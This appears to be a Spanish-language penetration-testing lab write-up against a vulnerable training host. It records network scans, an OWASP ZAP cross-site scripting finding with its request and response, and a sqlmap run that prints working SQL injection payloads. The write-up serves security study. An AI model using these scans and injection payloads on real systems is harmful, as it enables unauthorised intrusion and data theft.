# Inicial

## 1. ifconfig:
	root@kali:~# ifconfig
	eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
					inet 192.168.43.226  netmask 255.255.255.0  broadcast 192.168.43.255
					inet6 fe80::20c:29ff:fe95:f798  prefixlen 64  scopeid 0x20<link>
					ether 00:0c:29:95:f7:98  txqueuelen 1000  (Ethernet)
					RX packets 2259  bytes 157188 (153.5 KiB)
					RX errors 0  dropped 0  overruns 0  frame 0
					TX packets 5300  bytes 327486 (319.8 KiB)
					TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

	lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
					inet 127.0.0.1  netmask 255.0.0.0
					inet6 ::1  prefixlen 128  scopeid 0x10<host>
					loop  txqueuelen 1000  (Local Loopback)
					RX packets 64  bytes 3588 (3.5 KiB)
					RX errors 0  dropped 0  overruns 0  frame 0
					TX packets 64  bytes 3588 (3.5 KiB)
					TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

## 2. nmap:
**comando ejecutado**: `nmap -sP 192.168.1.1-255`
```
root@kali:~# nmap -sP 192.168.43.1-255
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-18 14:29 EST
Nmap scan report for 192.168.43.1
Host is up (0.012s latency).
MAC Address: B4:C4:FC:51:7F:08 (Unknown)
Nmap scan report for 192.168.43.27
Host is up (0.045s latency).
MAC Address: 76:DF:04:3C:C0:7D (Unknown)
Nmap scan report for 192.168.43.193
Host is up (0.00043s latency).
MAC Address: 00:0C:29:F5:0E:35 (VMware)
Nmap scan report for 192.168.43.225
Host is up (0.00014s latency).
MAC Address: F8:16:54:DD:F3:24 (Intel Corporate)
Nmap scan report for 192.168.43.226
Host is up.
Nmap done: 255 IP addresses (5 hosts up) scanned in 3.18 seconds
```

**comando ejecutado**: `nmap 192.168.1.129`
```
root@kali:~# nmap 192.168.43.193
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-18 14:31 EST
Nmap scan report for 192.168.43.193
Host is up (0.0019s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
901/tcp  open  samba-swat
3306/tcp open  mysql
MAC Address: 00:0C:29:F5:0E:35 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
```
**comando**: `nmap --script vuln 192.168.43.193`
```
80/tcp   open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.43.193
|   Found the following possible CSRF vulnerabilities: 

Path: http://192.168.43.193:80/events/
|     Form id: user-login-form
|     Form action: /events/?q=node&destination=node

Path: http://192.168.43.193:80/events/?q=user/password
|     Form id: user-pass
|     Form action: /events/?q=user/password

http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.43.193:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.43.193:80/?page=about%27%20OR%20sqlspider
|     http://192.168.43.193:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.43.193:80/?page=about%27%20OR%20sqlspider
|     http://192.168.43.193:80/events/?q=event%2fical%27%20OR%20sqlspider
|     http://192.168.43.193:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.43.193:80/?page=about%27%20OR%20sqlspider
|     http://192.168.43.193:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.43.193:80/?page=about%27%20OR%20sqlspider


```

## 3. Dirbuster
**Comando ejecutado:** `dirb http://192.168.43.193`


## 4. Exploración web
Hace referencia a una exploración manual en la web
### 4.1 Página principal: `/index.php`
No hubo nada aquí, sólo Phake Organization
### 4.2 Página info: `/info.php`
Se ve la info del PHP levantado en la computadora
### 4.3 Página mail: `/mail/src/login.php`

### 4.4 Página phpmyadmin setup `/phpmyadmin/setup/`

Versiones:
| Software 		| Versión	|
| -------------		| -------	|
| PHP 			| 5.2.4 	|
| MySQL			| 5.0.45	|
| SquirrelMail		| 1.4.11	|


# Secundario

## 1. OWASP ZAP
**URL de ataque:** `http://192.168.0.17/`
### Alerta encontrada:
* Cross Site Scripting
| URL		| http://192.168.0.17/list/ 	|
| ------------	| -------------------------	|
| Riesgo 	| High				|
| Confianza	| Low				|
| Parámetro	| email				|
| Ataque	| '"<script>alert(1);</script>	|
| Evidencia	| '"<script>alert(1);</script>	|
| CWE ID 	| 79				|
| WASC ID	| 8				|

**Petición**
```
POST http://192.168.0.17/list/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Referer: http://192.168.0.17/list/
Cookie: PHPSESSID=qtukf63m6lpa070a3ninu1uqn5
Host: 192.168.0.17

name=ZAP&email=%27%22%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&phone=ZAP&org=ZAP
```

**Respuesta**
```
HTTP/1.1 200 OK
Date: Fri, 22 Nov 2019 01:47:26 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.2.4
Content-Length: 321
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Phake Organization Registration</title>
</head>
<body>
<!-- Connected successfully -->Query errorYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"<script>alert(1);</script>', phone='ZAP', org='ZAP'' at line 1
```

Como se puede observar, la vulnerabilidad es de XSS, pero el error que arroja es de SQL, por lo que podemos imaginar que es posible encontrar un vulnerabilidad de SQL Injection

## 2. Sqlmap
Dado el XSS descubierto con OWASP ZAP, vimos la posibilidad de aplicar sqlmap a la misma URL y el cuerpo algo modificado.

**Comando ejecutado:**
```sqlmap -u "http://192.168.0.17/list/" --data="name=ZAP&email=%27zap@zap.com&phone=ZAP&org=ZAP"```

Finalmente, el ataque nos muestra lo siguiente:

```
POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 443 HTTP(s) requests:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: name=ZAP' RLIKE (SELECT (CASE WHEN (1311=1311) THEN 0x5a4150 ELSE 0x28 END))-- yaUH&email='zap@zap.com&phone=ZAP&org=ZAP

    Type: error-based
    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: name=ZAP' OR ROW(6038,4132)>(SELECT COUNT(*),CONCAT(0x716b717071,(SELECT (ELT(6038=6038,1))),0x7162707671,FLOOR(RAND(0)*2))x FROM (SELECT 2164 UNION SELECT 9549 UNION SELECT 6318 UNION SELECT 5890)a GROUP BY x)-- anAh&email='zap@zap.com&phone=ZAP&org=ZAP

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: name=ZAP' OR SLEEP(5)-- SRZX&email='zap@zap.com&phone=ZAP&org=ZAP
---
[01:33:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 8 or 7 or 6 (Moonshine or Zod or Werewolf)
web application technology: PHP 5.2.4, Apache 2.2.6
back-end DBMS: MySQL >= 4.1
```
*Un reporte detallado de los resultados del sqlmap se mostrarán en la carpeta sqlmap*
